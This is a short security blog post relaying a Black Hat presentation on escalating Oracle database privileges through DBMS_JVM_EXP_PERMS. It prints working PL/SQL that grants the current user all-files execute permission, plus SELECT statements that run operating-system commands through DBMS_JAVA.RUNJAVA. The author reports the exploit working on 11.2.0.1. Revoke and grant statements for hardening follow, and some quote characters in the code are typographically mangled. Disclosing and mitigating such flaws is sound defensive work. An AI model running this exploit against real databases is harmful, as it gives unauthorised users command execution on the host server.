I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is online.
David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT GRANT,USER(), SYS,’java.io.FilePermission,<<ALL FILES>>,execute,’ENABLED from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava(oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst)from dual;
For security reasons you should:
revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on „oracle/aurora/util/Wrapper“ from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.
SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(‚oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3‘);